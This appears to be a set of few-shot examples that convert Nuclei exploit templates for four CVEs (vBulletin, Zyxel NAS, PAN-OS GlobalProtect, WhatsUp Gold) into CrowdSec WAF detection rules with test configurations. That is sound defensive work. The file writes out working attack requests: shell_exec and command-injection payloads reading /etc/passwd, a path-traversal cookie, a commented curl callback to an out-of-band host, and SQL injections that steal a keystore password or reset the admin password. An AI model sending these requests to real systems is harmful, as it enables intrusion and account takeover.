### 1 - Example Input (Nuclei Template):
```yaml
id: CVE-2020-17496

info:
  name: vBulletin 5.5.4 - 5.6.2- Remote Command Execution
  author: pussycat0x
  severity: critical
  description: 'vBulletin versions 5.5.4 through 5.6.2 allow remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.'

http:
  - raw:
      - |
        POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
```

### Example Output (Detection Rule):
===RULE===
name: crowdsecurity/vpatch-CVE-2020-17496
description: 'vBulletin RCE (CVE-2020-17496)'
rules:
  - and:
    - zones:
      - URI
      transform:
      - lowercase
      match:
        type: endsWith
        value: /ajax/render/widget_tabbedcontainer_tab_panel
    - zones:
      - BODY_ARGS
      variables:
      - /subwidgets\[[0-9]+\]\[template\]/
      match:
        type: equals
        value: widget_php
    - zones:
      - BODY_ARGS_NAMES
      match:
        type: regex
        value: subWidgets\[[0-9]+\]\[config\]\[code\]

labels:
  type: exploit
  service: http
  confidence: 3
  spoofable: 0
  behavior: 'http:exploit'
  label: 'vBulletin - RCE'
  classification:
   - cve.CVE-2020-17496
   - attack.T1595
   - attack.T1190
   - cwe.CWE-74

===TEST_CONFIG====
appsec-rules:
- ./appsec-rules/crowdsecurity/base-config.yaml
- ./appsec-rules/crowdsecurity/vpatch-CVE-2020-17496.yaml
nuclei_template: CVE-2020-17496.yaml

===TEST_NUCLEI====
id: CVE-2020-17496
info:
  name: CVE-2020-17496
  author: crowdsec
  severity: info
  description: CVE-2020-17496 testing
  tags: appsec-testing
http:
  - raw:
      - |
        POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;

    cookie-reuse: true
    #test will fail because we won't match http status
    matchers:
    - type: status
      status:
       - 403


### 2 - Example Input (Nuclei Template):
```yaml
id: CVE-2020-9054

info:
  name: Zyxel NAS Firmware 5.21- Remote Code Execution
  description: 'Multiple Zyxel network-attached storage (NAS) devices running firmware version 5.21 contain a pre-authentication command injection vulnerability.'
  classification:
    cvss-score: 9.8
    cve-id: CVE-2020-9054
    cwe-id: CWE-78
  tags: cve2020,cve,rce,zyxel,injection,kev

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
# digest: 490a00463044022043cae3ef335cbb2f8c7c8501b6c55a84c61f07feb27f26bb32429e52e8a2a2fa02203c126dbc246c5d52e30849054d666a5f58c164092064ac5a42d35936e313562b:922c64590222798bb761d5b6d8e72950
```

### Example Output (Detection Rule):
===RULE===
name: crowdsecurity/vpatch-CVE-2020-9054
description: 'Detects pre-authentication command injection in Zyxel NAS devices via weblogin.cgi'
rules:
  - and:
      - zones:
          - URI
        transform:
          - lowercase
        match:
          type: contains
          value: /cgi-bin/weblogin.cgi
      - zones:
          - ARGS
        variables:
          - username
        transform:
          - lowercase
        match:
          type: contains
          value: "'"

labels:
  type: exploit
  service: http
  confidence: 3
  spoofable: 0
  behavior: 'http:exploit'
  label: 'Zyxel NAS - RCE'
  classification:
    - cve.CVE-2020-9054
    - attack.T1190
    - cwe.CWE-78


===TEST_CONFIG====
appsec-rules:
  - ./appsec-rules/crowdsecurity/base-config.yaml
  - ./appsec-rules/crowdsecurity/vpatch-CVE-2020-9054.yaml
nuclei_template: CVE-2020-9054.yaml

===TEST_NUCLEI====
id: CVE-2020-9054
info:
  name: CVE-2020-9054
  author: crowdsec
  severity: info
  description: CVE-2020-9054 testing
  tags: appsec-testing
http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd"
    cookie-reuse: true
    matchers:
    - type: status
      status:
       - 403



### 3 - Example Input (Nuclei Template):
```yaml
id: CVE-2024-3400

info:
  name: GlobalProtect - OS Command Injection
  author: salts,parthmalhotra
  severity: critical
  description: |
    A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.

http:
  - raw:
      - |
        GET /global-protect/portal/images/{{randstr}}.txt HTTP/1.1 HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /ssl-vpn/hipreport.esp HTTP/1.1
        Host: {{Hostname}}
        Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/{{randstr}}.txt;
        Content-Type: application/x-www-form-urlencoded

        user=global&portal=global&authcookie=e51140e4-4ee3-4ced-9373-96160d68&domain=global&computer=global&client-ip=global&client-ipv6=global&md5-sum=global&gwHipReportCheck=global
      - |
        GET /global-protect/portal/images/{{randstr}}.txt HTTP/1.1 HTTP/1.1
        Host: {{Hostname}}

      # Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}{{interactsh-url}}`; payload for rce, requires cronjob to be executed to run command

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - status_code_1 == 404 && status_code_3 == 403
          - contains(body_2, 'invalid required input parameters')
        condition: and
# digest: 4a0a00473045022008b369ceac1f6e7ed59d42e2370c7ad327a6867980958a81925d5d25122b3f090221009987bd7cdcc2964e527754acdbbd8fbdc3555c53445648c5eb77102ebd08cde7:922c64590222798bb761d5b6d8e72950
```

### Example Output (Detection Rule):
===RULE===
name: crowdsecurity/vpatch-CVE-2024-3400
description: 'Detects OS command injection in GlobalProtect feature of Palo Alto Networks PAN-OS'
rules:
  - and:
      - zones:
          - URI
        transform:
          - lowercase
        match:
          type: contains
          value: /ssl-vpn/hipreport.esp
      - zones:
          - HEADERS
        variables:
          - Cookie
        transform:
          - lowercase
        match:
          type: contains
          value: sessid=/../../

labels:
  type: exploit
  service: http
  confidence: 3
  spoofable: 0
  behavior: 'http:exploit'
  label: 'GlobalProtect - RCE'
  classification:
    - cve.CVE-2024-3400
    - attack.T1190
    - cwe.CWE-20
    - cwe.CWE-77

===TEST_CONFIG====
appsec-rules:
  - ./appsec-rules/crowdsecurity/base-config.yaml
  - ./appsec-rules/crowdsecurity/vpatch-CVE-2024-3400.yaml
nuclei_template: CVE-2024-3400.yaml

===TEST_NUCLEI====
id: CVE-2024-3400
info:
  name: CVE-2024-3400
  author: crowdsec
  severity: info
  description: CVE-2024-3400 testing
  tags: appsec-testing
http:
  - raw:
      - |
        POST /ssl-vpn/hipreport.esp HTTP/1.1
        Host: {{Hostname}}
        Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/{{randstr}}.txt;
        Content-Type: application/x-www-form-urlencoded

        user=global&portal=global&authcookie=e51140e4-4ee3-4ced-9373-96160d68&domain=global&computer=global&client-ip=global&client-ipv6=global&md5-sum=global&gwHipReportCheck=global
    cookie-reuse: true
    matchers:
    - type: status
      status:
       - 403


### 4 - Example Input (Nuclei Template):
```yaml
id: CVE-2024-6670

info:
  name: WhatsUp Gold HasErrors SQL Injection - Authentication Bypass
  author: DhiyaneshDK,princechaddha
  severity: critical
  description: |
    In WhatsUp Gold versions released before 2024.0.0, a SQL Injection vulnerability allows an unauthenticated attacker to retrieve the users encrypted password.

variables:
  username: "admin"
  password: "{{to_lower(rand_text_alpha(8))}}"

http:
  - raw:
      - |
        POST /NmConsole/WugSystemAppSettings/JMXSecurity HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"KeyStorePassword": "{{password}}", "TrustStorePassword": "{{password}}"}

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(set_cookie, 'ASP.NET_SessionId=')
        condition: and
        internal: true

  - raw:
      - |
        POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"deviceId": "22222", "classId": "DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE ProActiveAlert SET sAlertName='psyduck'+( SELECT sValue FROM GlobalSettings WHERE sName = '_GLOBAL_:JavaKeyStorePwd');--", "range": "1", "n": "1", "start": "3", "end": "4", "businesdsHoursId": "5"}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
        condition: and
        internal: true
```

### Example Output (Detection Rule):
===RULE===
name: crowdsecurity/vpatch-CVE-2024-6670
description: 'WhatsUp Gold HasErrors SQL Injection - Authentication Bypass'
rules:
  - and:
      - zones:
          - URI
        transform:
          - lowercase
        match:
          type: contains
          value: /nmconsole/platform/performancemonitorerrors/haserrors
      - zones:
          - BODY_ARGS
        variables:
          - json.classId
        transform:
          - lowercase
          - urldecode
        match:
          type: contains
          value: "'"

labels:
  type: exploit
  service: http
  confidence: 3
  spoofable: 0
  behavior: 'http:exploit'
  label: 'WhatsUp Gold - Authentication Bypass'
  classification:
    - cve.CVE-2024-6670
    - attack.T1190
    - cwe.CWE-20
    - cwe.CWE-77

===TEST_CONFIG====
appsec-rules:
  - ./appsec-rules/crowdsecurity/base-config.yaml
  - ./appsec-rules/crowdsecurity/vpatch-CVE-2024-6670.yaml
nuclei_template: CVE-2024-6670.yaml

===TEST_NUCLEI====
id: CVE-2024-6670
info:
  name: CVE-2024-6670
  author: crowdsec
  severity: info
  description: CVE-2024-6670 testing
  tags: appsec-testing
http:
  - raw:
      - |
        POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"deviceId": "22222", "classId": "DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE WebUser SET sPassword = {{encryptedPassword}} where sUserName = 'admin';--", "range": "1", "n": "1", "start": "3", "end": "4", "businesdsHoursId": "5"}
    cookie-reuse: true
    matchers:
    - type: status
      status:
       - 403
